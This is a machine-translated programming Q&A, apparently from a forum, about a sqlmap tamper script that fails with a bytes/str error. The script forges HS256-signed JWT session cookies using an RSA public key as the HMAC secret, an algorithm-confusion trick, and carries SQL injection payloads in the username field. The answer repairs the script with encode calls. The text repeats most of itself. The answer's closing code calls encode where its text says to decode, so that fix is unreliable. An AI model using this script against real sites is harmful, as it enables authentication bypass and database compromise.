Custom sqlmap tamper script giving error: `bytes-like object is required, not 'str'`
Custom sqlmap tamper script giving error: `bytes-like object is required, not 'str'`
我正在尝试为 sqlmap 编写一个篡改脚本,以将我的有效负载包装在 JSON Web Token (JWT) 中并将其发送到会话 cookie 中。但是,当我尝试 运行 我在 sqlmap 中的篡改脚本时,通过:
sqlmap -u "http://example.com/" --cookie="session=*" --tamper="plain2jwt.py" -v 3
我得到以下 error/output:
[10:37:13] [DEBUG] cleaning up configuration parameters
[10:37:13] [INFO] loading tamper module 'plain2jwt'
[10:37:13] [DEBUG] setting the HTTP timeout
[10:37:13] [DEBUG] setting the HTTP Cookie header
[10:37:13] [DEBUG] setting the HTTP User-Agent header
[10:37:13] [DEBUG] creating HTTP requests opener object
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[10:37:20] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [DEBUG] resolving hostname 'example.com'
[10:37:20] [INFO] testing connection to the target URL
[10:37:21] [DEBUG] declared web page charset 'utf-8'
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[10:37:21] [INFO] testing if the target URL content is stable
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [INFO] target URL content is stable
[10:37:21] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
[10:37:21] [CRITICAL] error occurred while running tamper function 'plain2jwt' ('TypeError: a bytes-like object is required, not 'str'')
[10:37:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
我不确定是什么导致了此错误,因为当我 运行 脚本独立时我没有收到任何错误,而其他篡改脚本似乎返回的是字符串而不是类似字节的对象。我什至尝试对我的输出进行编码,但这似乎没有帮助。我的篡改脚本如下:
#!/usr/bin/env python
import hmac
import hashlib
import base64
import json
import imp
enums = imp.load_source("lib.core.enums", "/usr/share/sqlmap/lib/core/enums.py")
__priority__ = enums.PRIORITY.NORMAL
def tamper(payload, **kwargs):
'''
'''
header = {
"alg":"HS256",
"typ":"JWT"
}
payload = {
"username":payload,
"pk":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n",
"iat":"1583764126"
}
key = "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n"
unsigned_token = base64.b64encode(json.dumps(header)).strip('=') + '.' + base64.b64encode(json.dumps(payload)).strip('=')
signature = hmac.new(key, unsigned_token, hashlib.sha256)
token = unsigned_token + '.' + base64.b64encode(signature.hexdigest()).strip('=')
return token if payload else payload
知道是什么原因造成的吗?谢谢!
base64.b64encode 将一个类似字节的对象作为参数。所以你必须先编码你的字符串。 hmac.new.
也是如此
所以你可以这样做,例如:
unsigned_token = base64.b64encode(json.dumps(header).encode('utf-8')).strip(b'=') + b'.' + base64.b64encode(json.dumps(payload).encode('utf-8')).strip(b'=')
signature = hmac.new(key.encode('utf-8'), unsigned_token, hashlib.sha256)
token = unsigned_token + b'.' + base64.b64encode(signature.hexdigest().encode('utf-8')).strip(b'=')
然后,正如 OP 指出的那样,tamper 需要 return 一个字符串,因此您最终必须将字节解码回 str,例如:
return token.encode('utf-8')
我正在尝试为 sqlmap 编写一个篡改脚本,以将我的有效负载包装在 JSON Web Token (JWT) 中并将其发送到会话 cookie 中。但是,当我尝试 运行 我在 sqlmap 中的篡改脚本时,通过:
sqlmap -u "http://example.com/" --cookie="session=*" --tamper="plain2jwt.py" -v 3
我得到以下 error/output:
[10:37:13] [DEBUG] cleaning up configuration parameters
[10:37:13] [INFO] loading tamper module 'plain2jwt'
[10:37:13] [DEBUG] setting the HTTP timeout
[10:37:13] [DEBUG] setting the HTTP Cookie header
[10:37:13] [DEBUG] setting the HTTP User-Agent header
[10:37:13] [DEBUG] creating HTTP requests opener object
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[10:37:20] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [DEBUG] resolving hostname 'example.com'
[10:37:20] [INFO] testing connection to the target URL
[10:37:21] [DEBUG] declared web page charset 'utf-8'
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[10:37:21] [INFO] testing if the target URL content is stable
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [INFO] target URL content is stable
[10:37:21] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
[10:37:21] [CRITICAL] error occurred while running tamper function 'plain2jwt' ('TypeError: a bytes-like object is required, not 'str'')
[10:37:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
我不确定是什么导致了此错误,因为当我 运行 脚本独立时我没有收到任何错误,而其他篡改脚本似乎返回的是字符串而不是类似字节的对象。我什至尝试对我的输出进行编码,但这似乎没有帮助。我的篡改脚本如下:
#!/usr/bin/env python
import hmac
import hashlib
import base64
import json
import imp
enums = imp.load_source("lib.core.enums", "/usr/share/sqlmap/lib/core/enums.py")
__priority__ = enums.PRIORITY.NORMAL
def tamper(payload, **kwargs):
'''
'''
header = {
"alg":"HS256",
"typ":"JWT"
}
payload = {
"username":payload,
"pk":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n",
"iat":"1583764126"
}
key = "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n"
unsigned_token = base64.b64encode(json.dumps(header)).strip('=') + '.' + base64.b64encode(json.dumps(payload)).strip('=')
signature = hmac.new(key, unsigned_token, hashlib.sha256)
token = unsigned_token + '.' + base64.b64encode(signature.hexdigest()).strip('=')
return token if payload else payload
知道是什么原因造成的吗?谢谢!
base64.b64encode 将一个类似字节的对象作为参数。所以你必须先编码你的字符串。 hmac.new.
所以你可以这样做,例如:
unsigned_token = base64.b64encode(json.dumps(header).encode('utf-8')).strip(b'=') + b'.' + base64.b64encode(json.dumps(payload).encode('utf-8')).strip(b'=')
signature = hmac.new(key.encode('utf-8'), unsigned_token, hashlib.sha256)
token = unsigned_token + b'.' + base64.b64encode(signature.hexdigest().encode('utf-8')).strip(b'=')
然后,正如 OP 指出的那样,tamper 需要 return 一个字符串,因此您最终必须将字节解码回 str,例如:
return token.encode('utf-8')